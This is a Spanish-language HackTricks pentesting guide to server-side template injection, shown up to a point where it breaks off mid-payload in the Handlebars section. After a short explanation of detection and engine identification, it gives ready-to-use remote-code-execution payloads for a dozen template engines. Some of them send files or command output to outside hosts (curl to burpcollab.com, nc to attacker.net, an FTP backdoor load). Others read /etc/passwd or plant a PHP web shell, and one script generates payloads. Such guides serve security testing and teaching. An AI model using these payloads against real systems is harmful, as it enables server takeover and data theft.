hacktricks/pentesting-web/ssti-server-side-template-injection/README.md

# Inyección de plantillas en el lado del servidor (SSTI)

<details>

<summary><strong>Aprende hacking en AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Experto en Red Team de AWS de HackTricks)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**swag oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.

</details>

<figure><img src="../../.gitbook/assets/image (1) (3) (3).png" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com) es el evento de ciberseguridad más relevante en **España** y uno de los más importantes en **Europa**. Con **la misión de promover el conocimiento técnico**, este congreso es un punto de encuentro crucial para profesionales de tecnología y ciberseguridad en todas las disciplinas.

{% embed url="https://www.rootedcon.com/" %}

## ¿Qué es la inyección de plantillas en el lado del servidor?

Una inyección de plantillas en el lado del servidor ocurre cuando un atacante es capaz de utilizar la sintaxis de plantillas nativas para inyectar un payload malicioso en una plantilla, que luego se ejecuta en el servidor.

Los **motores de plantillas** están diseñados para **generar páginas web** combinando plantillas **fijas** con datos **volátiles**. Los ataques de inyección de plantillas en el lado del servidor pueden ocurrir cuando la **entrada del usuario** se concatena directamente **en una plantilla**, en lugar de pasarse como datos. Esto permite a los atacantes **inyectar directivas de plantilla arbitrarias** para manipular el motor de plantillas, a menudo permitiéndoles tomar **control completo del servidor**.

Un ejemplo de código vulnerable se muestra a continuación:
```php
$output = $twig->render("Dear " . $_GET['name']);
```
En el ejemplo anterior **parte de la plantilla** en sí misma está siendo **generada dinámicamente** utilizando el parámetro `GET` `name`. Dado que la sintaxis de la plantilla se evalúa en el servidor, esto potencialmente permite a un atacante colocar un payload de inyección de plantilla en el servidor dentro del parámetro `name` de la siguiente manera:
```
http://vulnerable-website.com/?name={{bad-stuff-here}}
```
## Construyendo un ataque de inyección de plantillas en el servidor

![](../../.gitbook/assets/ssti-methodology-diagram.png)

### Detectar

Al igual que con cualquier vulnerabilidad, el primer paso hacia la explotación es poder encontrarla. Quizás el enfoque inicial más simple sea intentar **fuzzear la plantilla** inyectando una secuencia de caracteres especiales comúnmente utilizados en expresiones de plantillas, como el políglota **`${{<%[%'"}}%\`.**\
Para verificar si el servidor es vulnerable, debes **detectar las diferencias** entre la respuesta con **datos regulares** en el parámetro y la **carga útil proporcionada**.\
Si se produce un **error**, será bastante fácil darse cuenta de que **el servidor es vulnerable** e incluso qué **motor está en ejecución**. Pero también podrías encontrar un servidor vulnerable si esperabas que **reflejara** la carga útil proporcionada y **no se está reflejando** o si faltan algunos **caracteres** en la respuesta.

**Detectar - Contexto de texto plano**

La entrada proporcionada se está **renderizando y reflejando** en la respuesta. Esto puede ser fácilmente **confundido con una vulnerabilidad** de [**XSS**](../xss-cross-site-scripting/) simple, pero es fácil diferenciarlo si intentas establecer **operaciones matemáticas** dentro de una expresión de plantilla:
```
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
```
**Detectar - Contexto del código**

En estos casos, la **entrada del usuario** se coloca **dentro** de una **expresión de plantilla**:
```python
engine.render("Hello {{"+greeting+"}}", data)
```
La URL de acceso a esa página podría ser similar a: `http://vulnerable-website.com/?greeting=data.username`

Si **cambias** el parámetro **`greeting`** por un **valor diferente**, la **respuesta no contendrá el nombre de usuario**, pero si accedes a algo como: `http://vulnerable-website.com/?greeting=data.username}}hello` entonces, **la respuesta contendrá el nombre de usuario** (si los caracteres de cierre de la expresión de plantilla fueron **`}}`**).\
Si se produce un **error** durante estas pruebas, será más fácil detectar que el servidor es vulnerable.

### Identificar

Una vez que hayas detectado el potencial de inyección de plantillas, el siguiente paso es identificar el motor de plantillas.\
Aunque hay una gran cantidad de lenguajes de plantillas, muchos de ellos utilizan una sintaxis muy similar que se elige específicamente para no chocar con los caracteres HTML.

Si tienes suerte, el servidor estará **imprimiendo los errores** y podrás encontrar el **motor** utilizado **dentro** de los errores. Algunas cargas útiles posibles que pueden causar errores:

| `${}`       | `{{}}`       | `<%= %>`        |
| ----------- | ------------ | --------------- |
| `${7/0}`    | `{{7/0}}`    | `<%= 7/0 %>`    |
| `${foobar}` | `{{foobar}}` | `<%= foobar %>` |
| `${7*7}`    | `{{7*7}}`    | \`\`            |

De lo contrario, deberás probar manualmente **diferentes cargas específicas del lenguaje** y estudiar cómo son interpretadas por el motor de plantillas. Una forma común de hacer esto es inyectar operaciones matemáticas arbitrarias utilizando la sintaxis de diferentes motores de plantillas. Luego puedes observar si se evalúan correctamente. Para ayudar en este proceso, puedes usar un árbol de decisiones similar al siguiente:

![](<../../.gitbook/assets/image (272).png>)

### Explotar

**Leer**

El primer paso después de encontrar la inyección de plantillas e identificar el motor de plantillas es leer la documentación. Áreas clave de interés son:

* Secciones 'Para autores de plantillas' que cubren la sintaxis básica.
* 'Consideraciones de seguridad' - es probable que quien desarrolló la aplicación que estás probando no haya leído esto, y puede contener algunas pistas útiles.
* Listas de métodos, funciones, filtros y variables integrados.
* Listas de extensiones/complementos - algunos pueden estar habilitados de forma predeterminada.

**Explorar**

Suponiendo que no se han presentado exploits, el siguiente paso es **explorar el entorno** para averiguar exactamente a qué **tienes acceso**. Puedes esperar encontrar tanto **objetos predeterminados** proporcionados por el motor de plantillas, como **objetos específicos de la aplicación** pasados a la plantilla por el desarrollador. Muchos sistemas de plantillas exponen un objeto 'self' o de espacio de nombres que contiene todo en el ámbito, y una forma idiomática de listar los atributos y métodos de un objeto.

Si no hay un objeto self integrado, tendrás que probar nombres de variables por fuerza bruta utilizando [SecLists](https://github.com/danielmiessler/SecLists/blob/25d4ac447efb9e50b640649f1a09023e280e5c9c/Discovery/Web-Content/burp-parameter-names.txt) y la colección de listas de palabras de Burp Intruder.

Los objetos proporcionados por el desarrollador son particularmente propensos a contener información sensible, y pueden variar entre diferentes plantillas dentro de una aplicación, por lo que este proceso idealmente debería aplicarse a cada plantilla individualmente.

**Atacar**

En este punto, deberías tener una **idea clara de la superficie de ataque** disponible y poder proceder con técnicas tradicionales de auditoría de seguridad, revisando cada función en busca de vulnerabilidades explotables. Es importante abordar esto en el contexto de la aplicación en general - algunas funciones pueden usarse para explotar características específicas de la aplicación. Los ejemplos a seguir utilizarán la inyección de plantillas para desencadenar la creación arbitraria de objetos, la lectura/escritura arbitraria de archivos, la inclusión remota de archivos, la divulgación de información y vulnerabilidades de escalada de privilegios.

## Herramientas

### [TInjA](https://github.com/Hackmanit/TInjA)

un escáner eficiente de SSTI + CSTI que utiliza políglotos novedosos
```bash
tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
tinja url -u "http://example.com/" -d "username=Kirlia"  -c "PHPSESSID=ABC123..."
```
### [SSTImap](https://github.com/vladko312/sstimap)
```bash
python3 sstimap.py -i -l 5
python3 sstimap.py -u "http://example.com/ --crawl 5 --forms
python3 sstimap.py -u 'https://example.com/page?name=John' -s
```
### [Tplmap](https://github.com/epinna/tplmap)
```python
python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link"
python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
```
### [Tabla de Inyección de Plantillas](https://github.com/Hackmanit/template-injection-table)

una tabla interactiva que contiene los políglotos de inyección de plantillas más eficientes junto con las respuestas esperadas de los 44 motores de plantillas más importantes.

## Exploits

### Genérico

En esta **lista de palabras** puedes encontrar **variables definidas** en los entornos de algunos de los motores mencionados a continuación:

* [https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt)

### Java

**Java - Inyección básica**
```java
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
```
**Java - Obtener las variables de entorno del sistema**
```java
${T(java.lang.System).getenv()}
```
**Java - Obtener /etc/passwd**
```java
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
### FreeMarker (Java)

Puedes probar tus payloads en [https://try.freemarker.apache.org](https://try.freemarker.apache.org)

* `{{7*7}} = {{7*7}}`
* `${7*7} = 49`
* `#{7*7} = 49 -- (legacy)`
* `${7*'7'} Nothing`
* `${foobar}`
```java
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}

${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")}
```
**Freemarker - Bypass de sandbox**

⚠️ solo funciona en versiones de Freemarker inferiores a 2.3.30
```java
<#assign classloader=article.class.protectionDomain.classLoader>
<#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")>
<#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)>
<#assign ec=classloader.loadClass("freemarker.template.utility.Execute")>
${dwf.newInstance(ec,null)("id")}
```
**Más información**

* En la sección de FreeMarker de [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#freemarker)

### Velocity (Java)
```java
#set($str=$class.inspect("java.lang.String").type)
#set($chr=$class.inspect("java.lang.Character").type)
#set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$str.valueOf($chr.toChars($out.read()))
#end
```
**Más información**

* En la sección de Velocity de [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#velocity)

### Thymeleaf (Java)

La expresión de prueba típica para SSTI es `${7*7}`. Esta expresión también funciona en Thymeleaf. Si deseas lograr la ejecución de código remoto, puedes usar una de las siguientes expresiones de prueba:

* SpringEL: `${T(java.lang.Runtime).getRuntime().exec('calc')}`
* OGNL: `${#rt = @java.lang.Runtime@getRuntime(),#rt.exec("calc")}`

Sin embargo, como mencionamos anteriormente, las expresiones solo funcionan en atributos especiales de Thymeleaf. Si es necesario usar una expresión en una ubicación diferente en la plantilla, Thymeleaf admite _inlineado de expresiones_. Para usar esta característica, debes colocar una expresión dentro de `[[...]]` o `[(...)]` (selecciona uno u otro dependiendo de si necesitas escapar símbolos especiales). Por lo tanto, un payload de detección de SSTI simple para Thymeleaf sería `[[${7*7}]]`.

Sin embargo, las posibilidades de que el payload de detección anterior funcione son muy bajas. Las vulnerabilidades de SSTI generalmente ocurren cuando una plantilla se genera dinámicamente en el código. Thymeleaf, por defecto, no permite tales plantillas generadas dinámicamente y todas las plantillas deben crearse previamente. Por lo tanto, si un desarrollador desea crear una plantilla a partir de una cadena _sobre la marcha_, necesitaría crear su propio TemplateResolver. Esto es posible pero ocurre muy raramente.

Si nos adentramos más en la documentación del motor de plantillas Thymeleaf, encontraremos una característica interesante llamada _**preprocesamiento de expresiones**_. Las expresiones colocadas entre doble guion bajo (`__...__`) son preprocesadas y el resultado del preprocesamiento se utiliza como parte de la expresión durante el procesamiento regular. Aquí tienes un ejemplo oficial de la documentación de Thymeleaf:
```java
#{selection.__${sel.code}__}
```
**Ejemplo vulnerable**
```markup
<a th:href="@{__${path}__}" th:title="${title}">
<a th:href="${''.getClass().forName('java.lang.Runtime').getRuntime().exec('curl -d @/flag.txt burpcollab.com')}" th:title='pepito'>

http://localhost:8082/(7*7)
http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
```
**Más información**

* [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)

{% content-ref url="el-expression-language.md" %}
[el-expression-language.md](el-expression-language.md)
{% endcontent-ref %}

### Marco Spring (Java)
```java
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
```
**Saltar filtros**

Se pueden usar múltiples expresiones de variables, si `${...}` no funciona, prueba con `#{...}`, `*{...}`, `@{...}` o `~{...}`.

* Leer `/etc/passwd`
```java
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
```
* Script personalizado para la generación de payloads
```python
#!/usr/bin/python3

## Written By Zeyad Abulaban (zAbuQasem)
# Usage: python3 gen.py "id"

from sys import argv

cmd = list(argv[1].strip())
print("Payload: ", cmd , end="\n\n")
converted = [ord(c) for c in cmd]
base_payload = '*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec'
end_payload = '.getInputStream())}'

count = 1
for i in converted:
if count == 1:
base_payload += f"(T(java.lang.Character).toString({i}).concat"
count += 1
elif count == len(converted):
base_payload += f"(T(java.lang.Character).toString({i})))"
else:
base_payload += f"(T(java.lang.Character).toString({i})).concat"
count += 1

print(base_payload + end_payload)
```
**Más información**

* [Thymleaf SSTI](https://javamana.com/2021/11/20211121071046977B.html)
* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#java---retrieve-etcpasswd)

### Manipulación de Vistas de Spring (Java)
```java
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x
```
* [https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation)

{% content-ref url="el-expression-language.md" %}
[el-expression-language.md](el-expression-language.md)
{% endcontent-ref %}

### Pebble (Java)

* `{{ someString.toUPPERCASE() }}`

Versión antigua de Pebble ( < versión 3.0.9):
```java
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }}
```
Nueva versión de Pebble:
```java
{% raw %}
{% set cmd = 'id' %}
{% endraw %}


{% set bytes = (1).TYPE
.forName('java.lang.Runtime')
.methods[6]
.invoke(null,null)
.exec(cmd)
.inputStream
.readAllBytes() %}
{{ (1).TYPE
.forName('java.lang.String')
.constructors[0]
.newInstance(([bytes]).toArray()) }}
```
### Jinjava (Java)

Jinjava es un motor de plantillas Java que admite la inyección de plantillas en el lado del servidor (SSTI). Permite a los atacantes ejecutar código remoto en el servidor afectado.
```java
{{'a'.toUpperCase()}} would result in 'A'
{{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
```
**Jinjava - Ejecución de comandos**

Corregido por [https://github.com/HubSpot/jinjava/pull/230](https://github.com/HubSpot/jinjava/pull/230)
```java
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}

{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
```
**Más información**

* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinjava)

### Hubspot - HuBL (Java)

* Delimitadores de declaración `{% %}`
* Delimitadores de expresión `{{ }}`
* Delimitadores de comentario `{# #}`
* `{{ request }}` - com.hubspot.content.hubl.context.TemplateContextRequest@23548206
* `{{'a'.toUpperCase()}}` - "A"
* `{{'a'.concat('b')}}` - "ab"
* `{{'a'.getClass()}}` - java.lang.String
* `{{request.getClass()}}` - class com.hubspot.content.hubl.context.TemplateContextRequest
* `{{request.getClass().getDeclaredMethods()[0]}}` - public boolean com.hubspot.content.hubl.context.TemplateContextRequest.isDebug()

Buscar "com.hubspot.content.hubl.context.TemplateContextRequest" y descubrir el [proyecto Jinjava en Github](https://github.com/HubSpot/jinjava/).
```java
{{request.isDebug()}}
//output: False

//Using string 'a' to get an instance of class sun.misc.Launcher
{{'a'.getClass().forName('sun.misc.Launcher').newInstance()}}
//output: sun.misc.Launcher@715537d4

//It is also possible to get a new object of the Jinjava class
{{'a'.getClass().forName('com.hubspot.jinjava.JinjavaConfig').newInstance()}}
//output: com.hubspot.jinjava.JinjavaConfig@78a56797

//It was also possible to call methods on the created object by combining the


{% raw %}
{% %} and {{ }} blocks
{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}
{% endraw %}


{{ji.render('{{1*2}}')}}
//Here, I created a variable 'ji' with new instance of com.hubspot.jinjava.Jinjava class and obtained reference to the newInterpreter method. In the next block, I called the render method on 'ji' with expression {{1*2}}.

//{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
//output: xxx

//RCE
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
//output: java.lang.UNIXProcess@1e5f456e

//RCE with org.apache.commons.io.IOUtils.
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
//output: netstat execution

//Multiple arguments to the commands
Payload: {{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
//Output: Linux bumpy-puma 4.9.62-hs4.el6.x86_64 #1 SMP Fri Jun 1 03:00:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```
**Más información**

* [https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html)

### Lenguaje de Expresión - EL (Java)

* `${"aaaa"}` - "aaaa"
* `${99999+1}` - 100000.
* `#{7*7}` - 49
* `${{7*7}}` - 49
* `${{request}}, ${{session}}, {{faceContext}}`

EL proporciona un mecanismo importante para permitir que la capa de presentación (páginas web) se comunique con la lógica de la aplicación (beans administrados). EL es utilizado por **varias tecnologías de JavaEE**, como la tecnología JavaServer Faces, la tecnología JavaServer Pages (JSP) y la Inyección de Dependencias y Contextos para Java EE (CDI).\
Consulte la siguiente página para obtener más información sobre la **explotación de intérpretes EL**:

{% content-ref url="el-expression-language.md" %}
[el-expression-language.md](el-expression-language.md)
{% endcontent-ref %}

### Groovy (Java)

Los siguientes bypasses del Administrador de Seguridad fueron tomados de este [**informe**](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/).
```java
//Basic Payload
import groovy.*;
@groovy.transform.ASTTest(value={
cmd = "ping cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net "
assert java.lang.Runtime.getRuntime().exec(cmd.split(" "))
})
def x

//Payload to get output
import groovy.*;
@groovy.transform.ASTTest(value={
cmd = "whoami";
out = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).getInputStream()).useDelimiter("\\A").next()
cmd2 = "ping " + out.replaceAll("[^a-zA-Z0-9]","") + ".cq6qwx76mos92gp9eo7746dmgdm5au.burpcollaborator.net";
java.lang.Runtime.getRuntime().exec(cmd2.split(" "))
})
def x

//Other payloads
new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
this.evaluate(new String(java.util.Base64.getDecoder().decode("QGdyb292eS50cmFuc2Zvcm0uQVNUVGVzdCh2YWx1ZT17YXNzZXJ0IGphdmEubGFuZy5SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKCJpZCIpfSlkZWYgeA==")))
this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 114, 97, 110, 115, 102, 111, 114, 109, 46, 65, 83, 84, 84, 101, 115, 116, 40, 118, 97, 108, 117, 101, 61, 123, 97, 115, 115, 101, 114, 116, 32, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101, 46, 103, 101, 116, 82,117, 110, 116, 105, 109, 101, 40, 41, 46, 101, 120, 101, 99, 40, 34, 105, 100, 34, 41, 125, 41, 100, 101, 102, 32, 120}))
```
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) es el evento de ciberseguridad más relevante en **España** y uno de los más importantes en **Europa**. Con **la misión de promover el conocimiento técnico**, este congreso es un punto de encuentro clave para profesionales de tecnología y ciberseguridad en todas las disciplinas.

{% embed url="https://www.rootedcon.com/" %}

##

### Smarty (PHP)
```php
{$smarty.version}
{php}echo `id`;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
{system('ls')} // compatible v3
{system('cat index.php')} // compatible v3
```
**Más información**

* En la sección de Smarty de [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty)

### Twig (PHP)

* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
* `{{7*'7'}} = 49`
* `{{1/0}} = Error`
* `{{foobar}} Nothing`
```python
#Get Info
{{_self}} #(Ref. to current application)
{{_self.env}}
{{dump(app)}}
{{app.request.server.all|join(',')}}

#File read
"{{'/etc/passwd'|file_excerpt(1,30)}}"@

#Exec code
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{['id',""]|sort('system')}}

#Hide warnings and errors for automatic exploitation
{{["error_reporting", "0"]|sort("ini_set")}}
```
**Twig - Formato de plantilla**
```php
$output = $twig > render (
'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name)
);

$output = $twig > render (
"Dear {first_name}",
array("first_name" => $user.first_name)
);
```
**Más información**

* En la sección Twig y Twig (Sandboxed) de [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)

### Plates (PHP)

Plates está inspirado en Twig pero es un motor de plantillas PHP nativo en lugar de un motor de plantillas compilado.

controlador:
```php
// Create new Plates instance
$templates = new League\Plates\Engine('/path/to/templates');

// Render a template
echo $templates->render('profile', ['name' => 'Jonathan']);
```
plantilla de página:
```php
<?php $this->layout('template', ['title' => 'User Profile']) ?>

<h1>User Profile</h1>
<p>Hello, <?=$this->e($name)?></p>
```
plantilla de diseño:
```html
<html>
<head>
<title><?=$this->e($title)?></title>
</head>
<body>
<?=$this->section('content')?>
</body>
</html>
```
### PHPlib y HTML\_Template\_PHPLIB (PHP)

[HTML\_Template\_PHPLIB](https://github.com/pear/HTML\_Template\_PHPLIB) es lo mismo que PHPlib pero portado a Pear.

`authors.tpl`
```html
<html>
<head><title>{PAGE_TITLE}</title></head>
<body>
<table>
<caption>Authors</caption>
<thead>
<tr><th>Name</th><th>Email</th></tr>
</thead>
<tfoot>
<tr><td colspan="2">{NUM_AUTHORS}</td></tr>
</tfoot>
<tbody>
<!-- BEGIN authorline -->
<tr><td>{AUTHOR_NAME}</td><td>{AUTHOR_EMAIL}</td></tr>
<!-- END authorline -->
</tbody>
</table>
</body>
</html>
```
`authors.php`
```php
<?php
//we want to display this author list
$authors = array(
'Christian Weiske'  => 'cweiske@php.net',
'Bjoern Schotte'     => 'schotte@mayflower.de'
);

require_once 'HTML/Template/PHPLIB.php';
//create template object
$t =& new HTML_Template_PHPLIB(dirname(__FILE__), 'keep');
//load file
$t->setFile('authors', 'authors.tpl');
//set block
$t->setBlock('authors', 'authorline', 'authorline_ref');

//set some variables
$t->setVar('NUM_AUTHORS', count($authors));
$t->setVar('PAGE_TITLE', 'Code authors as of ' . date('Y-m-d'));

//display the authors
foreach ($authors as $name => $email) {
$t->setVar('AUTHOR_NAME', $name);
$t->setVar('AUTHOR_EMAIL', $email);
$t->parse('authorline_ref', 'authorline', true);
}

//finish and echo
echo $t->finish($t->parse('OUT', 'authors'));
?>
```
### Jade (NodeJS)

Jade, ahora conocido como Pug, es un motor de plantillas de NodeJS que permite la inyección de plantillas en el lado del servidor. Puedes explotar vulnerabilidades de inyección de plantillas en Jade para ejecutar código arbitrario en el servidor.
```javascript
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.net 80')
```

```javascript
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
```
**Más información**

* En la sección de Jade de [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen)

### patTemplate (PHP)

> [patTemplate](https://github.com/wernerwa/pat-template) es un motor de plantillas PHP que no compila, el cual utiliza etiquetas XML para dividir un documento en diferentes partes.
```xml
<patTemplate:tmpl name="page">
This is the main page.
<patTemplate:tmpl name="foo">
It contains another template.
</patTemplate:tmpl>
<patTemplate:tmpl name="hello">
Hello {NAME}.<br/>
</patTemplate:tmpl>
</patTemplate:tmpl>
```
### Handlebars (NodeJS)

Travesía de ruta (más información [aquí](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)).
```bash
curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'
```
* \= Error
* ${7\*7} = ${7\*7}
* Nada
```java
{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
